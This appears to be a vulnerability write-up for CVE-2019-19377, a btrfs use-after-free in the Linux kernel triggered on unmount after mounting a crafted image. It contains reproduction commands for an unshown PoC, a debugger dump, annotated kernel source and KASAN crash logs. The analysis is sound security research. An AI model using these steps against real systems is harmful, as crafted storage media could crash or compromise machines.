
CVE-2019-19377

Target

Linux Kernel btrfs FileSystem

Linux Version Availability
5.0.21 True

Bug Type

use-after-free

Abstract

Unmounting after some operations (with a crafted image) can cause a use-after-free in the btrfs_queue_work function.

It can be triggered not only locally (mounting a btrfs image from a local shell), but also remotely (mounting a corrupted USB stick or other storage that carries a crafted btrfs image).

Reproduce

gcc -o poc poc_2019_19377.c
mkdir mnt
mount poc_2019_19377.img ./mnt
cp poc ./mnt/
cd mnt
./poc
cd ..
umount ./mnt

Details

Debug view

────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0xdffffc0000000000  →  0xdffffc0000000000
$rbx   : 0xffff888067cf6840  →  0xffff88806648ae40  →  0xffff888067cf6740  →  0xffff88806bd32c00  →  0xffff888067739b10  →  0xffff88806c3ea200  →  0xffff88806c217900  →  0xffff88806ac58b80
$rcx   : 0xffffffff81a3c030  →  0x000000b848555441  →  0x000000b848555441
$rdx   : 0x1ffff1100cf9ed09  →  0x1ffff1100cf9ed09
$rsp   : 0xffff888064f9f788  →  0xffffffff81517225  →  0xc483480424448941  →  0xc483480424448941
$rbp   : 0xffff8880676e4d28  →  0xffffffff81a3ae50  →  0x53d86f8d48555441  →  0x53d86f8d48555441
$rsi   : 0xffff8880676e4d28  →  0xffffffff81a3ae50  →  0x53d86f8d48555441  →  0x53d86f8d48555441
$rdi   : 0xffff888067cf6848  →  0xffff88806ae2a900  →  0xffff88806bd33400  →  0xffff8880698dcd20  →  0xffff88806c3ea100  →  0xffff8880695e0f00  →  0xffff8880698b9840  →  0xffff8880664cf900
$rip   : 0xffffffff81aeddbc  →  0xfd98e9ffa2b26fe8  →  0xfd98e9ffa2b26fe8
$r8    : 0xffffffff81a3c020  →  0xad8727e928ef8348  →  0xad8727e928ef8348
$r9    : 0xffffffff81a413a1  →  0x00000009b8c38948  →  0x00000009b8c38948
$r10   : 0xffffffff81517225  →  0xc483480424448941  →  0xc483480424448941
$r11   : 0xffffffff81a413a1  →  0x00000009b8c38948  →  0x00000009b8c38948
$r12   : 0xffff88806bbc6600  →  0x1e44a09cf7d0cbce  →  0x1e44a09cf7d0cbce
$r13   : 0x0000000001c0f000  →  0x0000000001c0f000
$r14   : 0xffff8880676e4d28  →  0xffffffff81a3ae50  →  0x53d86f8d48555441  →  0x53d86f8d48555441
$r15   : 0xffff88806629c228  →  0x0000000000080000  →  0x0000000000080000
$eflags: [zero carry parity adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff888064f9f788│+0x0000: 0xffffffff81517225  →  0xc483480424448941  →  0xc483480424448941	 ← $rsp
0xffff888064f9f790│+0x0008: 0xffff8880676e4d00  →  0xffff88806629c228  →  0x0000000000080000  →  0x0000000000080000
0xffff888064f9f798│+0x0010: 0xffff888069fb6070  →  0x0000000000000000  →  0x0000000000000000
0xffff888064f9f7a0│+0x0018: 0xffff88806bbc6600  →  0x1e44a09cf7d0cbce  →  0x1e44a09cf7d0cbce
0xffff888064f9f7a8│+0x0020: 0x0000000001c0f000  →  0x0000000001c0f000
0xffff888064f9f7b0│+0x0028: 0xffff8880676e4d28  →  0xffffffff81a3ae50  →  0x53d86f8d48555441  →  0x53d86f8d48555441
0xffff888064f9f7b8│+0x0030: 0xffff88806629c228  →  0x0000000000080000  →  0x0000000000080000
0xffff888064f9f7c0│+0x0038: 0xffffffff81a4151d  →  0x5d415c415d5bc031  →  0x5d415c415d5bc031
──────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0xffffffff81aeddb2 <btrfs_queue_work+690> test   r13, r13
   0xffffffff81aeddb5 <btrfs_queue_work+693> jne    0xffffffff81aedd77 <btrfs_queue_work+631>
   0xffffffff81aeddb7 <btrfs_queue_work+695> jmp    0xffffffff81aedcab <btrfs_queue_work+427>
 → 0xffffffff81aeddbc <btrfs_queue_work+700> call   0xffffffff81519030 <__asan_report_load8_noabort>
   ↳  0xffffffff81519030 <__asan_report_load8_noabort+0> mov    rcx, QWORD PTR [rsp]
      0xffffffff81519034 <__asan_report_load8_noabort+4> xor    edx, edx
      0xffffffff81519036 <__asan_report_load8_noabort+6> mov    esi, 0x8
      0xffffffff8151903b <__asan_report_load8_noabort+11> jmp    0xffffffff815185f0 <kasan_report>
      0xffffffff81519040 <__asan_report_load16_noabort+0> mov    rcx, QWORD PTR [rsp]
      0xffffffff81519044 <__asan_report_load16_noabort+4> xor    edx, edx
────────────────────────────────────────────────────────────────────────────────────────── arguments ────
__asan_report_load8_noabort (
   long unsigned int var_0 = 0xffff888067cf6848 → 0xffff88806ae2a900 → 0xffff88806bd33400 → 0xffff8880698dcd20 → 0xffff88806c3ea100 → 0xffff8880695e0f00 → 0xffff8880698b9840 → 0xffff8880664cf900
)
──────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "", stopped, reason: BREAKPOINT
[#1] Id 2, Name: "", stopped, reason: BREAKPOINT
────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff81aeddbc → btrfs_queue_work(wq=0xffff888067cf6840, work=0xffff8880676e4d28)
[#1] 0xffffffff81a4151d → btrfs_wq_submit_bio(fs_info=0xffff88806bbc6600, bio=0xffff8880676e4d28, mirror_num=<optimized out>, bio_flags=<optimized out>, bio_offset=0xffffffff81a3c020, private_data=0xffffffff81a413a1 <btrfs_wq_submit_bio+81>, submit_bio_start=0xffffffff81a405c0 <btree_submit_bio_start>)
[#2] 0xffffffff81a4171c → btree_submit_bio_hook(private_data=0xffff88806629c228, bio=0xffff888069fb6070,mirror_num=0x0, bio_flags=<optimized out>, bio_offset=0x1c0f000)
[#3] 0xffffffff81ab130e → submit_one_bio(bio=0xffff888069fb6070, mirror_num=<optimized out>, bio_flags=<optimized out>)
[#4] 0xffffffff81ab1d7c → flush_write_bio(epd=<optimized out>)
[#5] 0xffffffff81ac5aeb → btree_write_cache_pages(mapping=<optimized out>, wbc=<optimized out>)
[#6] 0xffffffff81436a2c → do_writepages(mapping=0xffff88806629c388, wbc=0xffff888064f9fbd8)
[#7] 0xffffffff815c10f3 → __writeback_single_inode(inode=0xffff88806629c228, wbc=0xffff8880676e4d28)
[#8] 0xffffffff815c356d → writeback_single_inode(inode=0xffff88806629c228, wbc=0xffff888064f9fbd8)
[#9] 0xffffffff815c3955 → write_inode_now(inode=0xffff88806629c228, sync=<optimized out>)
─────────────────────────────────────────────────────────────────────────────────────────────────────────

Thread 1 hit Breakpoint 1, btrfs_queue_work (wq=0xffff888067cf6840, work=0xffff8880676e4d28) at fs/btrfs/async-threa
gef➤  p &wq->high
$5 = (struct __btrfs_workqueue **) 0xffff888067cf6848

The parameter wq has already been freed; the read of wq->high is the use-after-free.

Bug causes

fs/btrfs/async-thread.c:367 (link)

void btrfs_queue_work(struct btrfs_workqueue *wq,
		      struct btrfs_work *work)
{
	/*
	 * Dispatch @work to the high-priority queue only when the work item
	 * asks for it and this wrapper actually owns one; otherwise fall back
	 * to the normal queue.
	 *
	 * NOTE(review): @wq is dereferenced here without any lifetime check.
	 * The caller must guarantee the workqueue is still alive, i.e. that
	 * btrfs_stop_all_workers() has not already freed it; the KASAN report
	 * on this page is exactly that ordering violation during umount.
	 */
	int wants_high = test_bit(WORK_HIGH_PRIO_BIT, &work->flags);
	struct __btrfs_workqueue *target = (wants_high && wq->high) ? wq->high
								    : wq->normal;

	__btrfs_queue_work(target, work);
}

fs_info->workers (the struct btrfs_workqueue *wq passed in) has already been freed.

KASAN logs

on exec poc

[  266.988653] BTRFS warning (device loop0): suspicious: generation < cache_generation: 8 < 18374403900871474942
[  267.055186] BTRFS warning (device loop0): suspicious: generation < cache_generation: 8 < 18374403900871474942
[  267.122934] BTRFS warning (device loop0): suspicious: generation < cache_generation: 8 < 18374403900871474942
[  267.165168] WARNING: CPU: 1 PID: 1045 at fs/btrfs/extent-tree.c:7046 __btrfs_free_extent.isra.71+0xa16/0x1130
[  267.165168] Modules linked in:
[  267.165168] CPU: 1 PID: 1045 Comm: kworker/u4:5 Not tainted 5.0.21 #1
[  267.165168] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  267.165168] Workqueue: events_unbound btrfs_async_reclaim_metadata_space
[  267.165168] RIP: 0010:__btrfs_free_extent.isra.71+0xa16/0x1130
[  267.165168] Code: df 48 c1 ea 03 0f b6 04 02 84 c0 74 0e 3c 03 7f 0a 48 8b 7c 24 48 e8 c9 1a b0 ff 418b 4e 40 41 b8 01 00 00 00 e9 6e fe ff ff <0f> 0b 4c 89 f2 48 b8 00 00 00 00 00 fc ff df 48 c1 ea 03 80 3c 02
[  267.165168] RSP: 0018:ffff88806a26f7e0 EFLAGS: 00000246
[  267.165168] RAX: 00000000fffffffe RBX: 0000000000000007 RCX: 0000000000000000
[  267.165168] RDX: ffffed100d44deeb RSI: 0000000000000000 RDI: ffff8880694b8008
[  267.165168] RBP: 0000000001c04000 R08: 0000000000000000 R09: ffffed100d29700d
[  267.165168] R10: ffff8880694b806a R11: 0000000000000000 R12: 00000000fffffffe
[  267.165168] R13: 0000000000000000 R14: ffff8880694b8000 R15: 0000000000000000
[  267.165168] FS:  0000000000000000(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000
[  267.165168] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  267.165168] CR2: 0000000000727c88 CR3: 000000006beba000 CR4: 00000000000006e0
[  267.165168] Call Trace:
[  267.165168]  ? _raw_spin_lock+0x7f/0xe0
[  267.165168]  ? update_block_group+0xd50/0xd50
[  267.165168]  ? _raw_read_lock_irq+0x30/0x30
[  267.165168]  ? _raw_spin_lock+0x7f/0xe0
[  267.165168]  ? _raw_read_lock_irq+0x30/0x30
[  267.165168]  ? btrfs_merge_delayed_refs+0x1f1/0x9d0
[  267.165168]  __btrfs_run_delayed_refs+0x1236/0x3100
[  267.165168]  ? alloc_reserved_file_extent+0x860/0x860
[  267.165168]  ? _raw_read_lock_irq+0x30/0x30
[  267.165168]  ? kasan_unpoison_shadow+0x31/0x40
[  267.165168]  ? __kasan_kmalloc+0xd5/0xf0
[  267.165168]  ? join_transaction+0x2e4/0xe90
[  267.165168]  btrfs_run_delayed_refs+0x1b6/0x390
[  267.165168]  flush_space+0x5fa/0xde0
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? delayed_ref_async_start+0x2d0/0x2d0
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? _raw_spin_lock+0x7f/0xe0
[  267.165168]  ? _raw_read_lock_irq+0x30/0x30
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  btrfs_async_reclaim_metadata_space+0x451/0x1260
[  267.165168]  ? strscpy+0x95/0x310
[  267.165168]  process_one_work+0x580/0x1210
[  267.165168]  worker_thread+0x8a/0xfc0
[  267.165168]  ? __kthread_parkme+0x73/0xf0
[  267.165168]  ? rescuer_thread+0xc60/0xc60
[  267.165168]  kthread+0x2a9/0x390
[  267.165168]  ? kthread_destroy_worker+0x90/0x90
[  267.165168]  ret_from_fork+0x35/0x40
[  267.165168] ---[ end trace ae8f476daf11ea95 ]---
[  267.187699] BTRFS info (device loop0): leaf 29421568 gen 9 total ptrs 10 free space 3275 owner 18446744073709551610
[  267.190805] 	item 0 key (12582912 168 69632) itemoff 3942 itemsize 53
[  267.193486] 		extent refs 1 gen 9 flags 1
[  267.196265] 		ref#0: extent data backref root 5 objectid 265 offset 0 count 1
[  267.199482] 	item 1 key (12652544 168 36864) itemoff 3889 itemsize 53
[  267.203159] 		extent refs 1 gen 9 flags 1
[  267.203725] 		ref#0: extent data backref root 5 objectid 265 offset 131072 count 1
[  267.203980] 	item 2 key (12689408 168 262144) itemoff 3836 itemsize 53
[  267.203980] 		extent refs 1 gen 9 flags 1
[  267.203980] 		ref#0: extent data backref root 5 objectid 265 offset 262144 count 1
[  267.203980] 	item 3 key (12951552 168 61440) itemoff 3783 itemsize 53
[  267.203980] 		extent refs 1 gen 9 flags 1
[  267.203980] 		ref#0: extent data backref root 5 objectid 265 offset 524288 count 1
[  267.203980] 	item 4 key (13012992 168 49152) itemoff 3730 itemsize 53
[  267.203980] 		extent refs 1 gen 9 flags 1
[  267.203980] 		ref#0: extent data backref root 5 objectid 265 offset 655360 count 1
[  267.207732] 	item 5 key (13062144 168 24576) itemoff 3677 itemsize 53
[  267.210899] 		extent refs 1 gen 9 flags 1
[  267.211173] 		ref#0: extent data backref root 5 objectid 265 offset 786432 count 1
[  267.214637] 	item 6 key (13090816 168 4096) itemoff 3624 itemsize 53
[  267.214926] 		extent refs 1 gen 9 flags 1
[  267.217439] 		ref#0: extent data backref root 5 objectid 259 offset 0 count 1
[  267.217899] 	item 7 key (29360128 169 0) itemoff 3591 itemsize 33
[  267.220401] 		extent refs 1 gen 9 flags 2
[  267.220590] 		ref#0: tree block backref root 5
[  267.220958] 	item 8 key (29368320 169 0) itemoff 3558 itemsize 33
[  267.221142] 		extent refs 1 gen 9 flags 2
[  267.223433] 		ref#0: tree block backref root 7
[  267.223622] 	item 9 key (29372416 169 1) itemoff 3525 itemsize 33
[  267.223811] 		extent refs 1 gen 9 flags 2
[  267.223919] 		ref#0: tree block backref root 5
[  267.224076] BTRFS error (device loop0): unable to find ref byte nr 29376512 parent 0 root 7  owner 0 offset 0
[  267.224266] ------------[ cut here ]------------
[  267.224281] WARNING: CPU: 1 PID: 1045 at fs/btrfs/extent-tree.c:7052 __btrfs_free_extent.isra.71+0xaa0/0x1130
[  267.224281] Modules linked in:
[  267.224281] CPU: 1 PID: 1045 Comm: kworker/u4:5 Tainted: G        W         5.0.21 #1
[  267.224281] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  267.224281] Workqueue: events_unbound btrfs_async_reclaim_metadata_space
[  267.224281] RIP: 0010:__btrfs_free_extent.isra.71+0xaa0/0x1130
[  267.224281] Code: b0 05 00 00 48 8b 44 24 10 48 8b 40 50 f0 48 0f ba a8 b8 0c 00 00 02 72 13 be fe ffff ff 48 c7 c7 c0 ae d2 83 e8 00 14 6f ff <0f> 0b 48 8b 7c 24 10 b9 fe ff ff ff ba 8c 1b 00 00 48 c7 c6 40 c4
[  267.224281] RSP: 0018:ffff88806a26f7e0 EFLAGS: 00000282
[  267.224281] RAX: 0000000000000000 RBX: 0000000000000007 RCX: ffffffff813b1280
[  267.224281] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffff88806d3304d0
[  267.224281] RBP: 0000000001c04000 R08: ffffed100da6609b R09: ffffed100da6609b
[  267.224281] R10: dffffc0000000000 R11: ffffed100da6609a R12: 00000000fffffffe
[  267.224281] R13: 0000000000000000 R14: ffff8880694b8000 R15: 0000000000000000
[  267.224281] FS:  0000000000000000(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000
[  267.224281] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  267.224281] CR2: 0000000000727c88 CR3: 000000006beba000 CR4: 00000000000006e0
[  267.224281] Call Trace:
[  267.224281]  ? _raw_spin_lock+0x7f/0xe0
[  267.224281]  ? update_block_group+0xd50/0xd50
[  267.224281]  ? _raw_read_lock_irq+0x30/0x30
[  267.224281]  ? _raw_spin_lock+0x7f/0xe0
[  267.224281]  ? _raw_read_lock_irq+0x30/0x30
[  267.224281]  ? btrfs_merge_delayed_refs+0x1f1/0x9d0
[  267.224281]  __btrfs_run_delayed_refs+0x1236/0x3100
[  267.224281]  ? alloc_reserved_file_extent+0x860/0x860
[  267.224281]  ? _raw_read_lock_irq+0x30/0x30
[  267.224281]  ? kasan_unpoison_shadow+0x31/0x40
[  267.224281]  ? __kasan_kmalloc+0xd5/0xf0
[  267.224281]  ? join_transaction+0x2e4/0xe90
[  267.224281]  btrfs_run_delayed_refs+0x1b6/0x390
[  267.224281]  flush_space+0x5fa/0xde0
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? delayed_ref_async_start+0x2d0/0x2d0
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? _raw_spin_lock+0x7f/0xe0
[  267.224281]  ? _raw_read_lock_irq+0x30/0x30
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  btrfs_async_reclaim_metadata_space+0x451/0x1260
[  267.224281]  ? strscpy+0x95/0x310
[  267.224281]  process_one_work+0x580/0x1210
[  267.224281]  worker_thread+0x8a/0xfc0
[  267.224281]  ? __kthread_parkme+0x73/0xf0
[  267.224281]  ? rescuer_thread+0xc60/0xc60
[  267.224281]  kthread+0x2a9/0x390
[  267.224281]  ? kthread_destroy_worker+0x90/0x90
[  267.224281]  ret_from_fork+0x35/0x40
[  267.224281] ---[ end trace ae8f476daf11ea96 ]---
[  267.243654] BTRFS: error (device loop0) in __btrfs_free_extent:7052: errno=-2 No such entry
[  267.246314] BTRFS info (device loop0): forced readonly
[  267.249337] BTRFS: error (device loop0) in btrfs_run_delayed_refs:3011: errno=-2 No such entry

on umount

[  272.756573] WARNING: CPU: 0 PID: 1922 at fs/btrfs/extent-tree.c:5995 btrfs_free_block_groups+0x7e2/0xaf0
[  272.757294] Modules linked in:
[  272.757294] CPU: 0 PID: 1922 Comm: umount Tainted: G        W         5.0.21 #1
[  272.757294] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  272.757294] RIP: 0010:btrfs_free_block_groups+0x7e2/0xaf0
[  272.757294] Code: 28 31 c0 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 0b e9 c9 fc ff ff 0f 0b e9 f2 fc ff ff0f 0b e9 1b fd ff ff 0f 0b e9 44 fd ff ff <0f> 0b e9 6d fd ff ff 0f 0b e9 96 fd ff ff 0f 0b e9 bf fd ff ff 0f
[  272.757294] RSP: 0018:ffff888064f9fc50 EFLAGS: 00000206
[  272.757294] RAX: dffffc0000000000 RBX: ffff88806bbc6600 RCX: 0000000000000000
[  272.757294] RDX: 1ffff1100d778cf9 RSI: 0000000000000004 RDI: ffff88806bbc67c8
[  272.757294] RBP: dffffc0000000000 R08: 1ffff1100c9f3f65 R09: 0000000000000002
[  272.757294] R10: ffff88806a030f28 R11: 0000000002000000 R12: ffff888069c29f80
[  272.757294] R13: ffff88806bbc6690 R14: ffff888069c2a050 R15: 0000000000000000
[  272.757294] FS:  00007f4d6191ee40(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
[  272.757294] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  272.757294] CR2: 00007f4d611e9d70 CR3: 0000000069972000 CR4: 00000000000006f0
[  272.757294] Call Trace:
[  272.757294]  close_ctree+0x308/0x750
[  272.757294]  ? transaction_kthread+0x400/0x400
[  272.757294]  ? dispose_list+0x180/0x180
[  272.757294]  ? dput+0x29c/0x3c0
[  272.757294]  generic_shutdown_super+0x126/0x370
[  272.757294]  kill_anon_super+0x31/0x50
[  272.757294]  btrfs_kill_super+0x36/0x2b0
[  272.757294]  deactivate_locked_super+0x80/0xc0
[  272.757294]  deactivate_super+0x13c/0x150
[  272.757294]  ? super_setup_bdi+0xa0/0xa0
[  272.757294]  cleanup_mnt+0x9a/0x130
[  272.757294]  task_work_run+0x11a/0x1b0
[  272.757294]  exit_to_usermode_loop+0x107/0x130
[  272.757294]  do_syscall_64+0x1e5/0x280
[  272.757294]  ? page_fault+0x8/0x30
[  272.757294]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.757294] RIP: 0033:0x7f4d61200d77
[  272.757294] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[  272.757294] RSP: 002b:00007ffc2b474258 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[  272.757294] RAX: 0000000000000000 RBX: 0000560b26f40080 RCX: 00007f4d61200d77
[  272.757294] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 0000560b26f44940
[  272.757294] RBP: 0000560b26f44940 R08: 0000560b26f43e10 R09: 0000000000000015
[  272.757294] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f4d61702e64
[  272.757294] R13: 0000000000000000 R14: 0000560b26f40260 R15: 00007ffc2b4744e0
[  272.757294] ---[ end trace ae8f476daf11ea97 ]---
[  272.771891] WARNING: CPU: 0 PID: 1922 at fs/btrfs/extent-tree.c:5996 btrfs_free_block_groups+0x7e9/0xaf0
[  272.772455] Modules linked in:
[  272.772455] CPU: 0 PID: 1922 Comm: umount Tainted: G        W         5.0.21 #1
[  272.772455] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  272.772455] RIP: 0010:btrfs_free_block_groups+0x7e9/0xaf0
[  272.772455] Code: 41 5d 41 5e 41 5f c3 0f 0b e9 c9 fc ff ff 0f 0b e9 f2 fc ff ff 0f 0b e9 1b fd ff ff0f 0b e9 44 fd ff ff 0f 0b e9 6d fd ff ff <0f> 0b e9 96 fd ff ff 0f 0b e9 bf fd ff ff 0f 0b e9 e8 fd ff ff e8
[  272.772455] RSP: 0018:ffff888064f9fc50 EFLAGS: 00000206
[  272.772455] RAX: dffffc0000000000 RBX: ffff88806bbc6600 RCX: 0000000000000000
[  272.772455] RDX: 1ffff1100d778cfa RSI: 0000000000000004 RDI: ffff88806bbc67d0
[  272.772455] RBP: dffffc0000000000 R08: 1ffff1100c9f3f65 R09: 0000000000000002
[  272.772455] R10: ffff88806a030f28 R11: 0000000002000000 R12: ffff888069c29f80
[  272.772455] R13: ffff88806bbc6690 R14: ffff888069c2a050 R15: 0000000000000000
[  272.772455] FS:  00007f4d6191ee40(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
[  272.772455] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  272.772455] CR2: 00007f4d611e9d70 CR3: 0000000069972000 CR4: 00000000000006f0
[  272.772455] Call Trace:
[  272.772455]  close_ctree+0x308/0x750
[  272.772455]  ? transaction_kthread+0x400/0x400
[  272.772455]  ? dispose_list+0x180/0x180
[  272.772455]  ? dput+0x29c/0x3c0
[  272.772455]  generic_shutdown_super+0x126/0x370
[  272.772455]  kill_anon_super+0x31/0x50
[  272.772455]  btrfs_kill_super+0x36/0x2b0
[  272.772455]  deactivate_locked_super+0x80/0xc0
[  272.772455]  deactivate_super+0x13c/0x150
[  272.772455]  ? super_setup_bdi+0xa0/0xa0
[  272.772455]  cleanup_mnt+0x9a/0x130
[  272.772455]  task_work_run+0x11a/0x1b0
[  272.772455]  exit_to_usermode_loop+0x107/0x130
[  272.772455]  do_syscall_64+0x1e5/0x280
[  272.772455]  ? page_fault+0x8/0x30
[  272.772455]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.772455] RIP: 0033:0x7f4d61200d77
[  272.772455] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[  272.772455] RSP: 002b:00007ffc2b474258 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[  272.772455] RAX: 0000000000000000 RBX: 0000560b26f40080 RCX: 00007f4d61200d77
[  272.772455] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 0000560b26f44940
[  272.772455] RBP: 0000560b26f44940 R08: 0000560b26f43e10 R09: 0000000000000015
[  272.772455] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f4d61702e64
[  272.772455] R13: 0000000000000000 R14: 0000560b26f40260 R15: 00007ffc2b4744e0
[  272.772455] ---[ end trace ae8f476daf11ea98 ]---
[  272.790491] WARNING: CPU: 0 PID: 1922 at fs/btrfs/extent-tree.c:10142 btrfs_free_block_groups+0x6ad/0xaf0
[  272.790605] Modules linked in:
[  272.790605] CPU: 0 PID: 1922 Comm: umount Tainted: G        W         5.0.21 #1
[  272.790605] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  272.790605] RIP: 0010:btrfs_free_block_groups+0x6ad/0xaf0
[  272.790605] Code: 0f 85 34 04 00 00 49 83 7f 98 00 75 1d 48 8d 7e 28 48 89 f8 48 c1 e8 03 42 80 3c 2000 0f 85 03 04 00 00 49 83 7f a0 00 74 0e <0f> 0b 31 c9 31 d2 48 89 df e8 35 4f fe ff 4c 89 f8 48 c1 e8 03 42
[  272.790605] RSP: 0018:ffff888064f9fc50 EFLAGS: 00000206
[  272.790605] RAX: 1ffff1100d4061e5 RBX: ffff88806bbc6600 RCX: ffff888068b79e80
[  272.790605] RDX: 00000000000f9b40 RSI: ffff88806a030f00 RDI: ffff88806a030f28
[  272.790605] RBP: ffff88806a031580 R08: ffffffff81516f72 R09: ffffffff815147e9
[  272.790605] R10: ffffffff815147e9 R11: ffffffff83632d56 R12: dffffc0000000000
[  272.790605] R13: ffff88806a0315f8 R14: 0000000000000000 R15: ffff88806a030f88
[  272.790605] FS:  00007f4d6191ee40(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
[  272.790605] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  272.790605] CR2: 00007f4d611e9d70 CR3: 0000000069972000 CR4: 00000000000006f0
[  272.790605] Call Trace:
[  272.790605]  close_ctree+0x308/0x750
[  272.790605]  ? transaction_kthread+0x400/0x400
[  272.790605]  ? dispose_list+0x180/0x180
[  272.790605]  ? dput+0x29c/0x3c0
[  272.790605]  generic_shutdown_super+0x126/0x370
[  272.790605]  kill_anon_super+0x31/0x50
[  272.790605]  btrfs_kill_super+0x36/0x2b0
[  272.790605]  deactivate_locked_super+0x80/0xc0
[  272.790605]  deactivate_super+0x13c/0x150
[  272.790605]  ? super_setup_bdi+0xa0/0xa0
[  272.790605]  cleanup_mnt+0x9a/0x130
[  272.790605]  task_work_run+0x11a/0x1b0
[  272.790605]  exit_to_usermode_loop+0x107/0x130
[  272.790605]  do_syscall_64+0x1e5/0x280
[  272.790605]  ? page_fault+0x8/0x30
[  272.790605]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.790605] RIP: 0033:0x7f4d61200d77
[  272.790605] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[  272.790605] RSP: 002b:00007ffc2b474258 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[  272.790605] RAX: 0000000000000000 RBX: 0000560b26f40080 RCX: 00007f4d61200d77
[  272.790605] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 0000560b26f44940
[  272.790605] RBP: 0000560b26f44940 R08: 0000560b26f43e10 R09: 0000000000000015
[  272.790605] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f4d61702e64
[  272.790605] R13: 0000000000000000 R14: 0000560b26f40260 R15: 00007ffc2b4744e0
[  272.790605] ---[ end trace ae8f476daf11ea99 ]---
[  272.807234] BTRFS info (device loop0): space_info 4 has 18243584 free, is not full
[  272.813300] BTRFS info (device loop0): space_info total=33554432, used=15179776, pinned=0, reserved=0, may_use=65536, readonly=65536
[  272.825171] ==================================================================
[  272.825171] BUG: KASAN: use-after-free in btrfs_queue_work+0x2c1/0x390
[  272.825171] Read of size 8 at addr ffff888067cf6848 by task umount/1922
[  272.825171]
[  272.825171] CPU: 0 PID: 1922 Comm: umount Tainted: G        W         5.0.21 #1
[  272.825171] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  272.825171] Call Trace:
[  272.825171]  dump_stack+0x5b/0x8b
[  272.825171]  print_address_description+0x70/0x280
[  272.825171]  ? btrfs_queue_work+0x2c1/0x390
[  272.825171]  kasan_report+0x13a/0x19b
